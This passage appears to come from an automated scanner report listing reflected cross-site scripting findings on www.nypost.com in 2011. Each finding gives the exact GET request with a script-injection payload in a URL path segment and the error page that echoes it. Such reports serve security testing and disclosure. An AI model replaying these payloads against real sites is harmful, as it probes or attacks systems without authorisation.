Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal947e2<script>alert(1)</script>de57eb99844/nypost/scripts/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.567. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f962<script>alert(1)</script>896d507b062 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost9f962<script>alert(1)</script>896d507b062/scripts/jquery.liscroll.nyp.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost9f962<script>alert(1)</script>896d507b062/scripts/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.568. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b8aa5<script>alert(1)</script>b07b82d5c97 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scriptsb8aa5<script>alert(1)</script>b07b82d5c97/jquery.liscroll.nyp.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scriptsb8aa5<script>alert(1)</script>b07b82d5c97/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.569. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload dd22f<script>alert(1)</script>b0be67b88d2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.jsdd22f<script>alert(1)</script>b0be67b88d2 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:47 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.jsdd22f<script>alert(1)</script>b0be67b88d2</p>
...[SNIP]...

1.570. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 56699<script>alert(1)</script>eba7fd80ed8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig56699<script>alert(1)</script>eba7fd80ed8/WebPortal/nypost/scripts/jquery1.3.1.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig56699<script>alert(1)</script>eba7fd80ed8/WebPortal/nypost/scripts/jquery1.3.1.js</p>
...[SNIP]...

1.571. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4e34f<script>alert(1)</script>638de93ca8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal4e34f<script>alert(1)</script>638de93ca8d/nypost/scripts/jquery1.3.1.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal4e34f<script>alert(1)</script>638de93ca8d/nypost/scripts/jquery1.3.1.js</p>
...[SNIP]...

1.572. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c157d<script>alert(1)</script>00484740350 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostc157d<script>alert(1)</script>00484740350/scripts/jquery1.3.1.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostc157d<script>alert(1)</script>00484740350/scripts/jquery1.3.1.js</p>
...[SNIP]...

1.573. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 111b7<script>alert(1)</script>5b1232e1b7a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts111b7<script>alert(1)</script>5b1232e1b7a/jquery1.3.1.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:40 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts111b7<script>alert(1)</script>5b1232e1b7a/jquery1.3.1.js</p>
...[SNIP]...

1.574. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8832a<script>alert(1)</script>69dd46c5aac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js8832a<script>alert(1)</script>69dd46c5aac HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:42 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js8832a<script>alert(1)</script>69dd46c5aac</p>
...[SNIP]...

1.575. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0523<script>alert(1)</script>9dbf90f3a74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfigb0523<script>alert(1)</script>9dbf90f3a74/WebPortal/nypost/unica/hbx_original.js?v=nim20100505 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:18 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfigb0523<script>alert(1)</script>9dbf90f3a74/WebPortal/nypost/unica/hbx_original.js</p>
...[SNIP]...

1.576. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d1a91<script>alert(1)</script>fa0f76d0e94 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortald1a91<script>alert(1)</script>fa0f76d0e94/nypost/unica/hbx_original.js?v=nim20100505 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortald1a91<script>alert(1)</script>fa0f76d0e94/nypost/unica/hbx_original.js</p>
...[SNIP]...

1.577. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b886e<script>alert(1)</script>e9ff3abda5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypostb886e<script>alert(1)</script>e9ff3abda5f/unica/hbx_original.js?v=nim20100505 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypostb886e<script>alert(1)</script>e9ff3abda5f/unica/hbx_original.js</p>
...[SNIP]...

1.578. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dfda4<script>alert(1)</script>4f57c1cd8bb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unicadfda4<script>alert(1)</script>4f57c1cd8bb/hbx_original.js?v=nim20100505 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unicadfda4<script>alert(1)</script>4f57c1cd8bb/hbx_original.js</p>
...[SNIP]...

1.579. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 88d86<script>alert(1)</script>b8815d7b643 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js88d86<script>alert(1)</script>b8815d7b643?v=nim20100505 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js88d86<script>alert(1)</script>b8815d7b643</p>
...[SNIP]...

1.580. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 324e0<script>alert(1)</script>23633d1701b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig324e0<script>alert(1)</script>23633d1701b/WebPortal/nypost/unica/migration.js?v=nim20091109 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig324e0<script>alert(1)</script>23633d1701b/WebPortal/nypost/unica/migration.js</p>
...[SNIP]...

1.581. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8413e<script>alert(1)</script>2aabc16e906 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal8413e<script>alert(1)</script>2aabc16e906/nypost/unica/migration.js?v=nim20091109 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal8413e<script>alert(1)</script>2aabc16e906/nypost/unica/migration.js</p>
...[SNIP]...

1.582. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97c53<script>alert(1)</script>31188999689 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost97c53<script>alert(1)</script>31188999689/unica/migration.js?v=nim20091109 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:11 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost97c53<script>alert(1)</script>31188999689/unica/migration.js</p>
...[SNIP]...

1.583. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cf00a<script>alert(1)</script>dafc13c3e42 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unicacf00a<script>alert(1)</script>dafc13c3e42/migration.js?v=nim20091109 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unicacf00a<script>alert(1)</script>dafc13c3e42/migration.js</p>
...[SNIP]...

1.584. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b6ba1<script>alert(1)</script>e817f670b1b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica/migration.jsb6ba1<script>alert(1)</script>e817f670b1b?v=nim20091109 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica/migration.jsb6ba1<script>alert(1)</script>e817f670b1b</p>
...[SNIP]...

